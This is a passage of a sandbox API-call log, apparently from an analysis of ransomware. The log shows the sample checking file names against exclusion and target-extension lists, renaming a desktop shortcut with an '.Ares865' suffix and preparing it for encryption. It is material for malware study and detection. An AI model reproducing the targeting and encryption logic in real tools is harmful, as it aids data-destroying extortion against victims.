[0057.410] lstrlenW (lpString="ndf") returned 3 [0057.410] lstrcmpiW (lpString1="lnk", lpString2="ndf") returned -1 [0057.410] lstrlenW (lpString="nnt") returned 3 [0057.410] lstrcmpiW (lpString1="lnk", lpString2="nnt") returned -1 [0057.410] lstrlenW (lpString="nrmlib") returned 6 [0057.410] lstrcmpiW (lpString1=" X.lnk", lpString2="nrmlib") returned -1 [0057.410] lstrlenW (lpString="ns2") returned 3 [0057.410] lstrcmpiW (lpString1="lnk", lpString2="ns2") returned -1 [0057.410] lstrlenW (lpString="ns3") returned 3 [0057.410] lstrcmpiW (lpString1="lnk", lpString2="ns3") returned -1 [0057.410] lstrlenW (lpString="ns4") returned 3 [0057.410] lstrcmpiW (lpString1="lnk", lpString2="ns4") returned -1 [0057.410] lstrlenW (lpString="nsf") returned 3 [0057.410] lstrcmpiW (lpString1="lnk", lpString2="nsf") returned -1 [0057.410] lstrlenW (lpString="nv") returned 2 [0057.410] lstrcmpiW (lpString1="nk", lpString2="nv") returned -1 [0057.410] lstrlenW (lpString="nv2") returned 3 [0057.410] lstrcmpiW (lpString1="lnk", lpString2="nv2") returned -1 [0057.410] lstrlenW (lpString="nwdb") returned 4 [0057.410] lstrcmpiW (lpString1=".lnk", lpString2="nwdb") returned -1 [0057.410] lstrlenW (lpString="nyf") returned 3 [0057.410] lstrcmpiW (lpString1="lnk", lpString2="nyf") returned -1 [0057.410] lstrlenW (lpString="odb") returned 3 [0057.410] lstrcmpiW (lpString1="lnk", lpString2="odb") returned -1 [0057.410] lstrlenW (lpString="odb") returned 3 [0057.411] lstrcmpiW (lpString1="lnk", lpString2="odb") returned -1 [0057.411] lstrlenW (lpString="oqy") returned 3 [0057.411] lstrcmpiW (lpString1="lnk", lpString2="oqy") returned -1 [0057.411] lstrlenW (lpString="ora") returned 3 [0057.411] lstrcmpiW (lpString1="lnk", lpString2="ora") returned -1 [0057.411] lstrlenW (lpString="orx") returned 3 [0057.411] lstrcmpiW (lpString1="lnk", lpString2="orx") returned -1 [0057.411] lstrlenW (lpString="owc") returned 3 [0057.411] lstrcmpiW (lpString1="lnk", lpString2="owc") returned -1 [0057.411] lstrlenW (lpString="p96") returned 3 [0057.411] lstrcmpiW (lpString1="lnk", lpString2="p96") returned -1 [0057.411] lstrlenW (lpString="p97") returned 3 [0057.411] lstrcmpiW (lpString1="lnk", lpString2="p97") returned -1 [0057.411] lstrlenW (lpString="pan") returned 3 [0057.411] lstrcmpiW (lpString1="lnk", lpString2="pan") returned -1 [0057.411] lstrlenW (lpString="pdb") returned 3 [0057.411] lstrcmpiW (lpString1="lnk", lpString2="pdb") returned -1 [0057.411] lstrlenW (lpString="pdm") returned 3 [0057.411] lstrcmpiW (lpString1="lnk", lpString2="pdm") returned -1 [0057.411] lstrlenW (lpString="pnz") returned 3 [0057.411] lstrcmpiW (lpString1="lnk", lpString2="pnz") returned -1 [0057.411] lstrlenW (lpString="qry") returned 3 [0057.411] lstrcmpiW (lpString1="lnk", lpString2="qry") returned -1 [0057.411] lstrlenW (lpString="qvd") returned 3 [0057.411] lstrcmpiW (lpString1="lnk", lpString2="qvd") returned -1 [0057.411] lstrlenW (lpString="rbf") returned 3 [0057.411] lstrcmpiW (lpString1="lnk", lpString2="rbf") returned -1 [0057.411] lstrlenW (lpString="rctd") returned 4 [0057.411] lstrcmpiW (lpString1=".lnk", lpString2="rctd") returned -1 [0057.411] lstrlenW (lpString="rod") returned 3 [0057.411] lstrcmpiW (lpString1="lnk", lpString2="rod") returned -1 [0057.411] lstrlenW (lpString="rodx") returned 4 [0057.411] lstrcmpiW (lpString1=".lnk", lpString2="rodx") returned -1 [0057.411] lstrlenW (lpString="rpd") returned 3 [0057.411] lstrcmpiW (lpString1="lnk", lpString2="rpd") returned -1 [0057.411] lstrlenW (lpString="rsd") returned 3 [0057.411] lstrcmpiW (lpString1="lnk", lpString2="rsd") returned -1 [0057.412] lstrlenW (lpString="sas7bdat") returned 8 [0057.412] lstrcmpiW (lpString1="er X.lnk", lpString2="sas7bdat") returned -1 [0057.412] lstrlenW (lpString="sbf") returned 3 [0057.412] lstrcmpiW (lpString1="lnk", lpString2="sbf") returned -1 [0057.412] lstrlenW (lpString="scx") returned 3 [0057.412] lstrcmpiW (lpString1="lnk", lpString2="scx") returned -1 [0057.412] lstrlenW (lpString="sdb") returned 3 [0057.412] lstrcmpiW (lpString1="lnk", lpString2="sdb") returned -1 [0057.412] lstrlenW (lpString="sdc") returned 3 [0057.412] lstrcmpiW (lpString1="lnk", lpString2="sdc") returned -1 [0057.412] lstrlenW (lpString="sdf") returned 3 [0057.412] lstrcmpiW (lpString1="lnk", lpString2="sdf") returned -1 [0057.412] lstrlenW (lpString="sis") returned 3 [0057.412] lstrcmpiW (lpString1="lnk", lpString2="sis") returned -1 [0057.412] lstrlenW (lpString="spq") returned 3 [0057.412] lstrcmpiW (lpString1="lnk", lpString2="spq") returned -1 [0057.412] lstrlenW (lpString="te") returned 2 [0057.412] lstrcmpiW (lpString1="nk", lpString2="te") returned -1 [0057.412] lstrlenW (lpString="teacher") returned 7 [0057.412] lstrcmpiW (lpString1="r X.lnk", lpString2="teacher") returned -1 [0057.412] lstrlenW (lpString="tmd") returned 3 [0057.412] lstrcmpiW (lpString1="lnk", lpString2="tmd") returned -1 [0057.412] lstrlenW (lpString="tps") returned 3 [0057.412] lstrcmpiW (lpString1="lnk", lpString2="tps") returned -1 [0057.412] lstrlenW (lpString="trc") returned 3 [0057.412] lstrcmpiW (lpString1="lnk", lpString2="trc") returned -1 [0057.412] lstrlenW (lpString="trc") returned 3 [0057.412] lstrcmpiW (lpString1="lnk", lpString2="trc") returned -1 [0057.412] lstrlenW (lpString="trm") returned 3 [0057.412] lstrcmpiW (lpString1="lnk", lpString2="trm") returned -1 [0057.412] lstrlenW (lpString="udb") returned 3 [0057.412] lstrcmpiW (lpString1="lnk", lpString2="udb") returned -1 [0057.412] lstrlenW (lpString="udl") returned 3 [0057.412] lstrcmpiW (lpString1="lnk", lpString2="udl") returned -1 [0057.412] lstrlenW (lpString="usr") returned 3 [0057.412] lstrcmpiW (lpString1="lnk", lpString2="usr") returned -1 [0057.412] lstrlenW (lpString="v12") returned 3 [0057.412] lstrcmpiW (lpString1="lnk", lpString2="v12") returned -1 [0057.413] lstrlenW (lpString="vis") returned 3 [0057.413] lstrcmpiW (lpString1="lnk", lpString2="vis") returned -1 [0057.413] lstrlenW (lpString="vpd") returned 3 [0057.413] lstrcmpiW (lpString1="lnk", lpString2="vpd") returned -1 [0057.413] lstrlenW (lpString="vvv") returned 3 [0057.413] lstrcmpiW (lpString1="lnk", lpString2="vvv") returned -1 [0057.413] lstrlenW (lpString="wdb") returned 3 [0057.413] lstrcmpiW (lpString1="lnk", lpString2="wdb") returned -1 [0057.413] lstrlenW (lpString="wmdb") returned 4 [0057.413] lstrcmpiW (lpString1=".lnk", lpString2="wmdb") returned -1 [0057.413] lstrlenW (lpString="wrk") returned 3 [0057.413] lstrcmpiW (lpString1="lnk", lpString2="wrk") returned -1 [0057.413] lstrlenW (lpString="xdb") returned 3 [0057.413] lstrcmpiW (lpString1="lnk", lpString2="xdb") returned -1 [0057.413] lstrlenW (lpString="xld") returned 3 [0057.413] lstrcmpiW (lpString1="lnk", lpString2="xld") returned -1 [0057.413] lstrlenW (lpString="xmlff") returned 5 [0057.413] lstrcmpiW (lpString1="X.lnk", lpString2="xmlff") returned -1 [0057.413] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\Public\\Desktop\\Adobe Reader X.lnk.Ares865") returned 50 [0057.413] MoveFileExW (lpExistingFileName="C:\\Users\\Public\\Desktop\\Adobe Reader X.lnk" (normalized: "c:\\users\\public\\desktop\\adobe reader x.lnk"), lpNewFileName="C:\\Users\\Public\\Desktop\\Adobe Reader X.lnk.Ares865" (normalized: "c:\\users\\public\\desktop\\adobe reader x.lnk.ares865"), dwFlags=0x1) returned 1 [0057.415] CreateFileW (lpFileName="C:\\Users\\Public\\Desktop\\Adobe Reader X.lnk.Ares865" (normalized: "c:\\users\\public\\desktop\\adobe reader x.lnk.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x15c [0057.415] GetFileSizeEx (in: hFile=0x15c, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=2025) returned 1 [0057.415] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x3030020 [0057.415] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2ef0 [0057.415] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f0518 [0057.415] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2effc8) returned 1 [0057.416] CryptGenRandom (in: hProv=0x2effc8, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0057.416] CryptReleaseContext (hProv=0x2effc8, dwFlags=0x0) returned 1 [0057.416] CreateFileMappingW (hFile=0x15c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0xaf0, lpName=0x0) returned 0x120 [0057.416] MapViewOfFile (hFileMappingObject=0x120, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xaf0) returned 0x190000 [0057.417] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2effc8) returned 1 [0057.417] CryptGenRandom (in: hProv=0x2effc8, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0057.417] CryptReleaseContext (hProv=0x2effc8, dwFlags=0x0) returned 1 [0057.417] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0057.417] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2f68 | out: hHeap=0x2b0000) returned 1 [0057.417] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x332fc8 [0057.417] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x324fc8 [0057.418] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x332fc8 | out: hHeap=0x2b0000) returned 1 [0057.418] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x3250e0 [0057.418] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d5ee0 [0057.418] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3250e0 | out: hHeap=0x2b0000) returned 1 [0057.418] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d5ee0 | out: hHeap=0x2b0000) returned 1 [0057.418] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x324fc8 | out: hHeap=0x2b0000) returned 1 [0057.418] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0057.418] CloseHandle (hObject=0x120) returned 1 [0057.418] CloseHandle (hObject=0x15c) returned 1 [0057.419] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2ef0 | out: hHeap=0x2b0000) returned 1 [0057.419] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f0518 | out: hHeap=0x2b0000) returned 1 [0057.419] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3030020 | out: hHeap=0x2b0000) returned 1 [0057.420] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x2826d6cd, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x2826d6cd, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x28860dd8, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0xae, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0057.420] lstrcmpiW (lpString1="desktop.ini", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0057.420] lstrcmpiW (lpString1="desktop.ini", lpString2="aoldtz.exe") returned 1 [0057.420] lstrcmpiW (lpString1="desktop.ini", lpString2=".") returned 1 [0057.420] lstrcmpiW (lpString1="desktop.ini", lpString2="..") returned 1 [0057.420] lstrcmpiW (lpString1="desktop.ini", lpString2="windows") returned -1 [0057.420] lstrcmpiW (lpString1="desktop.ini", lpString2="bootmgr") returned 1 [0057.420] lstrcmpiW (lpString1="desktop.ini", lpString2="temp") returned -1 [0057.420] lstrcmpiW (lpString1="desktop.ini", lpString2="pagefile.sys") returned -1 [0057.420] lstrcmpiW (lpString1="desktop.ini", lpString2="boot") returned 1 [0057.420] lstrcmpiW (lpString1="desktop.ini", lpString2="ids.txt") returned -1 [0057.420] lstrcmpiW (lpString1="desktop.ini", lpString2="ntuser.dat") returned -1 [0057.420] lstrcmpiW (lpString1="desktop.ini", lpString2="perflogs") returned -1 [0057.420] lstrcmpiW (lpString1="desktop.ini", lpString2="MSBuild") returned -1 [0057.420] lstrlenW (lpString="desktop.ini") returned 11 [0057.420] lstrlenW (lpString="C:\\Users\\Public\\Desktop\\Adobe Reader X.lnk") returned 42 [0057.420] lstrcpyW (in: lpString1=0x2cce430, lpString2="desktop.ini" | out: lpString1="desktop.ini") returned="desktop.ini" [0057.420] lstrlenW (lpString="desktop.ini") returned 11 [0057.420] lstrlenW (lpString="Ares865") returned 7 [0057.420] lstrcmpiW (lpString1="top.ini", lpString2="Ares865") returned 1 [0057.420] lstrlenW (lpString=".dll") returned 4 [0057.420] lstrcmpiW (lpString1="desktop.ini", lpString2=".dll") returned 1 [0057.420] lstrlenW (lpString=".lnk") returned 4 [0057.420] lstrcmpiW (lpString1="desktop.ini", lpString2=".lnk") returned 1 [0057.420] lstrlenW (lpString=".ini") returned 4 [0057.420] lstrcmpiW (lpString1="desktop.ini", lpString2=".ini") returned 1 [0057.420] lstrlenW (lpString=".sys") returned 4 [0057.420] lstrcmpiW (lpString1="desktop.ini", lpString2=".sys") returned 1 [0057.420] lstrlenW (lpString="desktop.ini") returned 11 [0057.420] lstrlenW (lpString="bak") returned 3 [0057.420] lstrcmpiW (lpString1="ini", lpString2="bak") returned 1 [0057.420] lstrlenW (lpString="ba_") returned 3 [0057.421] lstrcmpiW (lpString1="ini", lpString2="ba_") returned 1 [0057.421] lstrlenW (lpString="dbb") returned 3 [0057.421] lstrcmpiW (lpString1="ini", lpString2="dbb") returned 1 [0057.421] lstrlenW (lpString="vmdk") returned 4 [0057.421] lstrcmpiW (lpString1=".ini", lpString2="vmdk") returned -1 [0057.421] lstrlenW (lpString="rar") returned 3 [0057.421] lstrcmpiW (lpString1="ini", lpString2="rar") returned -1 [0057.421] lstrlenW (lpString="zip") returned 3 [0057.421] lstrcmpiW (lpString1="ini", lpString2="zip") returned -1 [0057.421] lstrlenW (lpString="tgz") returned 3 [0057.421] lstrcmpiW (lpString1="ini", lpString2="tgz") returned -1 [0057.421] lstrlenW (lpString="vbox") returned 4 [0057.421] lstrcmpiW (lpString1=".ini", lpString2="vbox") returned -1 [0057.421] lstrlenW (lpString="vdi") returned 3 [0057.421] lstrcmpiW (lpString1="ini", lpString2="vdi") returned -1 [0057.421] lstrlenW (lpString="vhd") returned 3 [0057.421] lstrcmpiW (lpString1="ini", lpString2="vhd") returned -1 [0057.421] lstrlenW (lpString="vhdx") returned 4 [0057.421] lstrcmpiW (lpString1=".ini", lpString2="vhdx") returned -1 [0057.421] lstrlenW (lpString="avhd") returned 4 [0057.421] lstrcmpiW (lpString1=".ini", lpString2="avhd") returned -1 [0057.421] lstrlenW (lpString="db") returned 2 [0057.421] lstrcmpiW (lpString1="ni", lpString2="db") returned 1 [0057.421] lstrlenW (lpString="db2") returned 3 [0057.421] lstrcmpiW (lpString1="ini", lpString2="db2") returned 1 [0057.421] lstrlenW (lpString="db3") returned 3 [0057.421] lstrcmpiW (lpString1="ini", lpString2="db3") returned 1 [0057.421] lstrlenW (lpString="dbf") returned 3 [0057.421] lstrcmpiW (lpString1="ini", lpString2="dbf") returned 1 [0057.421] lstrlenW (lpString="mdf") returned 3 [0057.421] lstrcmpiW (lpString1="ini", lpString2="mdf") returned -1 [0057.421] lstrlenW (lpString="mdb") returned 3 [0057.421] lstrcmpiW (lpString1="ini", lpString2="mdb") returned -1 [0057.421] lstrlenW (lpString="sql") returned 3 [0057.421] lstrcmpiW (lpString1="ini", lpString2="sql") returned -1 [0057.421] lstrlenW (lpString="sqlite") returned 6 [0057.421] lstrcmpiW (lpString1="op.ini", lpString2="sqlite") returned -1 [0057.421] lstrlenW (lpString="sqlite3") returned 7 [0057.422] lstrcmpiW (lpString1="top.ini", lpString2="sqlite3") returned 1 [0057.422] lstrlenW (lpString="sqlitedb") returned 8 [0057.422] lstrcmpiW (lpString1="ktop.ini", lpString2="sqlitedb") returned -1 [0057.422] lstrlenW (lpString="xml") returned 3 [0057.422] lstrcmpiW (lpString1="ini", lpString2="xml") returned -1 [0057.422] lstrlenW (lpString="$er") returned 3 [0057.422] lstrcmpiW (lpString1="ini", lpString2="$er") returned 1 [0057.422] lstrlenW (lpString="4dd") returned 3 [0057.422] lstrcmpiW (lpString1="ini", lpString2="4dd") returned 1 [0057.422] lstrlenW (lpString="4dl") returned 3 [0057.422] lstrcmpiW (lpString1="ini", lpString2="4dl") returned 1 [0057.422] lstrlenW (lpString="^^^") returned 3 [0057.422] lstrcmpiW (lpString1="ini", lpString2="^^^") returned 1 [0057.422] lstrlenW (lpString="abs") returned 3 [0057.422] lstrcmpiW (lpString1="ini", lpString2="abs") returned 1 [0057.422] lstrlenW (lpString="abx") returned 3 [0057.422] lstrcmpiW (lpString1="ini", lpString2="abx") returned 1 [0057.422] lstrlenW (lpString="accdb") returned 5 [0057.422] lstrcmpiW (lpString1="p.ini", lpString2="accdb") returned 1 [0057.422] lstrlenW (lpString="accdc") returned 5 [0057.422] lstrcmpiW (lpString1="p.ini", lpString2="accdc") returned 1 [0057.422] lstrlenW (lpString="accde") returned 5 [0057.422] lstrcmpiW (lpString1="p.ini", lpString2="accde") returned 1 [0057.422] lstrlenW (lpString="accdr") returned 5 [0057.422] lstrcmpiW (lpString1="p.ini", lpString2="accdr") returned 1 [0057.422] lstrlenW (lpString="accdt") returned 5 [0057.422] lstrcmpiW (lpString1="p.ini", lpString2="accdt") returned 1 [0057.422] lstrlenW (lpString="accdw") returned 5 [0057.422] lstrcmpiW (lpString1="p.ini", lpString2="accdw") returned 1 [0057.422] lstrlenW (lpString="accft") returned 5 [0057.422] lstrcmpiW (lpString1="p.ini", lpString2="accft") returned 1 [0057.422] lstrlenW (lpString="adb") returned 3 [0057.422] lstrcmpiW (lpString1="ini", lpString2="adb") returned 1 [0057.422] lstrlenW (lpString="adb") returned 3 [0057.422] lstrcmpiW (lpString1="ini", lpString2="adb") returned 1 [0057.422] lstrlenW (lpString="ade") returned 3 [0057.422] lstrcmpiW (lpString1="ini", lpString2="ade") returned 1 [0057.423] lstrlenW (lpString="adf") returned 3 [0057.423] lstrcmpiW (lpString1="ini", lpString2="adf") returned 1 [0057.423] lstrlenW (lpString="adn") returned 3 [0057.423] lstrcmpiW (lpString1="ini", lpString2="adn") returned 1 [0057.423] lstrlenW (lpString="adp") returned 3 [0057.423] lstrcmpiW (lpString1="ini", lpString2="adp") returned 1 [0057.423] lstrlenW (lpString="alf") returned 3 [0057.423] lstrcmpiW (lpString1="ini", lpString2="alf") returned 1 [0057.423] lstrlenW (lpString="ask") returned 3 [0057.423] lstrcmpiW (lpString1="ini", lpString2="ask") returned 1 [0057.423] lstrlenW (lpString="btr") returned 3 [0057.423] lstrcmpiW (lpString1="ini", lpString2="btr") returned 1 [0057.423] lstrlenW (lpString="cat") returned 3 [0057.423] lstrcmpiW (lpString1="ini", lpString2="cat") returned 1 [0057.423] lstrlenW (lpString="cdb") returned 3 [0057.423] lstrcmpiW (lpString1="ini", lpString2="cdb") returned 1 [0057.423] lstrlenW (lpString="ckp") returned 3 [0057.423] lstrcmpiW (lpString1="ini", lpString2="ckp") returned 1 [0057.423] lstrlenW (lpString="cma") returned 3 [0057.423] lstrcmpiW (lpString1="ini", lpString2="cma") returned 1 [0057.423] lstrlenW (lpString="cpd") returned 3 [0057.423] lstrcmpiW (lpString1="ini", lpString2="cpd") returned 1 [0057.423] lstrlenW (lpString="dacpac") returned 6 [0057.423] lstrcmpiW (lpString1="op.ini", lpString2="dacpac") returned 1 [0057.423] lstrlenW (lpString="dad") returned 3 [0057.423] lstrcmpiW (lpString1="ini", lpString2="dad") returned 1 [0057.423] lstrlenW (lpString="dadiagrams") returned 10 [0057.423] lstrcmpiW (lpString1="esktop.ini", lpString2="dadiagrams") returned 1 [0057.423] lstrlenW (lpString="daschema") returned 8 [0057.423] lstrcmpiW (lpString1="ktop.ini", lpString2="daschema") returned 1 [0057.423] lstrlenW (lpString="db-journal") returned 10 [0057.423] lstrcmpiW (lpString1="esktop.ini", lpString2="db-journal") returned 1 [0057.423] lstrlenW (lpString="db-shm") returned 6 [0057.423] lstrcmpiW (lpString1="op.ini", lpString2="db-shm") returned 1 [0057.423] lstrlenW (lpString="db-wal") returned 6 [0057.423] lstrcmpiW (lpString1="op.ini", lpString2="db-wal") returned 1 [0057.423] lstrlenW (lpString="dbc") returned 3 [0057.424] lstrcmpiW (lpString1="ini", lpString2="dbc") returned 1 [0057.424] lstrlenW (lpString="dbs") returned 3 [0057.424] lstrcmpiW (lpString1="ini", lpString2="dbs") returned 1 [0057.424] lstrlenW (lpString="dbt") returned 3 [0057.424] lstrcmpiW (lpString1="ini", lpString2="dbt") returned 1 [0057.424] lstrlenW (lpString="dbv") returned 3 [0057.424] lstrcmpiW (lpString1="ini", lpString2="dbv") returned 1 [0057.424] lstrlenW (lpString="dbx") returned 3 [0057.424] lstrcmpiW (lpString1="ini", lpString2="dbx") returned 1 [0057.424] lstrlenW (lpString="dcb") returned 3 [0057.424] lstrcmpiW (lpString1="ini", lpString2="dcb") returned 1 [0057.424] lstrlenW (lpString="dct") returned 3 [0057.424] lstrcmpiW (lpString1="ini", lpString2="dct") returned 1 [0057.424] lstrlenW (lpString="dcx") returned 3 [0057.424] lstrcmpiW (lpString1="ini", lpString2="dcx") returned 1 [0057.424] lstrlenW (lpString="ddl") returned 3 [0057.424] lstrcmpiW (lpString1="ini", lpString2="ddl") returned 1 [0057.424] lstrlenW (lpString="dlis") returned 4 [0057.424] lstrcmpiW (lpString1=".ini", lpString2="dlis") returned -1 [0057.424] lstrlenW (lpString="dp1") returned 3 [0057.424] lstrcmpiW (lpString1="ini", lpString2="dp1") returned 1 [0057.424] lstrlenW (lpString="dqy") returned 3 [0057.424] lstrcmpiW (lpString1="ini", lpString2="dqy") returned 1 [0057.424] lstrlenW (lpString="dsk") returned 3 [0057.424] lstrcmpiW (lpString1="ini", lpString2="dsk") returned 1 [0057.424] lstrlenW (lpString="dsn") returned 3 [0057.424] lstrcmpiW (lpString1="ini", lpString2="dsn") returned 1 [0057.424] lstrlenW (lpString="dtsx") returned 4 [0057.424] lstrcmpiW (lpString1=".ini", lpString2="dtsx") returned -1 [0057.424] lstrlenW (lpString="dxl") returned 3 [0057.424] lstrcmpiW (lpString1="ini", lpString2="dxl") returned 1 [0057.424] lstrlenW (lpString="eco") returned 3 [0057.424] lstrcmpiW (lpString1="ini", lpString2="eco") returned 1 [0057.424] lstrlenW (lpString="ecx") returned 3 [0057.424] lstrcmpiW (lpString1="ini", lpString2="ecx") returned 1 [0057.424] lstrlenW (lpString="edb") returned 3 [0057.424] lstrcmpiW (lpString1="ini", lpString2="edb") returned 1 [0057.424] lstrlenW (lpString="epim") returned 4 [0057.424] lstrcmpiW (lpString1=".ini", lpString2="epim") returned -1 [0057.425] lstrlenW (lpString="fcd") returned 3 [0057.425] lstrcmpiW (lpString1="ini", lpString2="fcd") returned 1 [0057.425] lstrlenW (lpString="fdb") returned 3 [0057.425] lstrcmpiW (lpString1="ini", lpString2="fdb") returned 1 [0057.425] lstrlenW (lpString="fic") returned 3 [0057.425] lstrcmpiW (lpString1="ini", lpString2="fic") returned 1 [0057.425] lstrlenW (lpString="flexolibrary") returned 12 [0057.425] lstrlenW (lpString="fm5") returned 3 [0057.425] lstrcmpiW (lpString1="ini", lpString2="fm5") returned 1 [0057.425] lstrlenW (lpString="fmp") returned 3 [0057.425] lstrcmpiW (lpString1="ini", lpString2="fmp") returned 1 [0057.425] lstrlenW (lpString="fmp12") returned 5 [0057.425] lstrcmpiW (lpString1="p.ini", lpString2="fmp12") returned 1 [0057.425] lstrlenW (lpString="fmpsl") returned 5 [0057.425] lstrcmpiW (lpString1="p.ini", lpString2="fmpsl") returned 1 [0057.425] lstrlenW (lpString="fol") returned 3 [0057.425] lstrcmpiW (lpString1="ini", lpString2="fol") returned 1 [0057.425] lstrlenW (lpString="fp3") returned 3 [0057.425] lstrcmpiW (lpString1="ini", lpString2="fp3") returned 1 [0057.425] lstrlenW (lpString="fp4") returned 3 [0057.425] lstrcmpiW (lpString1="ini", lpString2="fp4") returned 1 [0057.425] lstrlenW (lpString="fp5") returned 3 [0057.425] lstrcmpiW (lpString1="ini", lpString2="fp5") returned 1 [0057.425] lstrlenW (lpString="fp7") returned 3 [0057.425] lstrcmpiW (lpString1="ini", lpString2="fp7") returned 1 [0057.425] lstrlenW (lpString="fpt") returned 3 [0057.425] lstrcmpiW (lpString1="ini", lpString2="fpt") returned 1 [0057.425] lstrlenW (lpString="frm") returned 3 [0057.425] lstrcmpiW (lpString1="ini", lpString2="frm") returned 1 [0057.425] lstrlenW (lpString="gdb") returned 3 [0057.425] lstrcmpiW (lpString1="ini", lpString2="gdb") returned 1 [0057.425] lstrlenW (lpString="gdb") returned 3 [0057.425] lstrcmpiW (lpString1="ini", lpString2="gdb") returned 1 [0057.425] lstrlenW (lpString="grdb") returned 4 [0057.425] lstrcmpiW (lpString1=".ini", lpString2="grdb") returned -1 [0057.425] lstrlenW (lpString="gwi") returned 3 [0057.425] lstrcmpiW (lpString1="ini", lpString2="gwi") returned 1 [0057.425] lstrlenW (lpString="hdb") returned 3 [0057.426] lstrcmpiW (lpString1="ini", lpString2="hdb") returned 1 [0057.426] lstrlenW (lpString="his") returned 3 [0057.426] lstrcmpiW (lpString1="ini", lpString2="his") returned 1 [0057.426] lstrlenW (lpString="ib") returned 2 [0057.426] lstrcmpiW (lpString1="ni", lpString2="ib") returned 1 [0057.426] lstrlenW (lpString="idb") returned 3 [0057.426] lstrcmpiW (lpString1="ini", lpString2="idb") returned 1 [0057.426] lstrlenW (lpString="ihx") returned 3 [0057.426] lstrcmpiW (lpString1="ini", lpString2="ihx") returned 1 [0057.426] lstrlenW (lpString="itdb") returned 4 [0057.426] lstrcmpiW (lpString1=".ini", lpString2="itdb") returned -1 [0057.426] lstrlenW (lpString="itw") returned 3 [0057.426] lstrcmpiW (lpString1="ini", lpString2="itw") returned -1 [0057.426] lstrlenW (lpString="jet") returned 3 [0057.426] lstrcmpiW (lpString1="ini", lpString2="jet") returned -1 [0057.426] lstrlenW (lpString="jtx") returned 3 [0057.426] lstrcmpiW (lpString1="ini", lpString2="jtx") returned -1 [0057.426] lstrlenW (lpString="kdb") returned 3 [0057.426] lstrcmpiW (lpString1="ini", lpString2="kdb") returned -1 [0057.426] lstrlenW (lpString="kexi") returned 4 [0057.426] lstrcmpiW (lpString1=".ini", lpString2="kexi") returned -1 [0057.426] lstrlenW (lpString="kexic") returned 5 [0057.426] lstrcmpiW (lpString1="p.ini", lpString2="kexic") returned 1 [0057.426] lstrlenW (lpString="kexis") returned 5 [0057.426] lstrcmpiW (lpString1="p.ini", lpString2="kexis") returned 1 [0057.426] lstrlenW (lpString="lgc") returned 3 [0057.426] lstrcmpiW (lpString1="ini", lpString2="lgc") returned -1 [0057.426] lstrlenW (lpString="lwx") returned 3 [0057.426] lstrcmpiW (lpString1="ini", lpString2="lwx") returned -1 [0057.426] lstrlenW (lpString="maf") returned 3 [0057.426] lstrcmpiW (lpString1="ini", lpString2="maf") returned -1 [0057.426] lstrlenW (lpString="maq") returned 3 [0057.426] lstrcmpiW (lpString1="ini", lpString2="maq") returned -1 [0057.426] lstrlenW (lpString="mar") returned 3 [0057.426] lstrcmpiW (lpString1="ini", lpString2="mar") returned -1 [0057.426] lstrlenW (lpString="marshal") returned 7 [0057.426] lstrcmpiW (lpString1="top.ini", lpString2="marshal") returned 1 [0057.427] lstrlenW (lpString="mas") returned 3 [0057.427] lstrcmpiW (lpString1="ini", lpString2="mas") returned -1 [0057.427] lstrlenW (lpString="mav") returned 3 [0057.427] lstrcmpiW (lpString1="ini", lpString2="mav") returned -1 [0057.427] lstrlenW (lpString="maw") returned 3 [0057.427] lstrcmpiW (lpString1="ini", lpString2="maw") returned -1 [0057.427] lstrlenW (lpString="mdbhtml") returned 7 [0057.427] lstrcmpiW (lpString1="top.ini", lpString2="mdbhtml") returned 1 [0057.427] lstrlenW (lpString="mdn") returned 3 [0057.427] lstrcmpiW (lpString1="ini", lpString2="mdn") returned -1 [0057.427] lstrlenW (lpString="mdt") returned 3 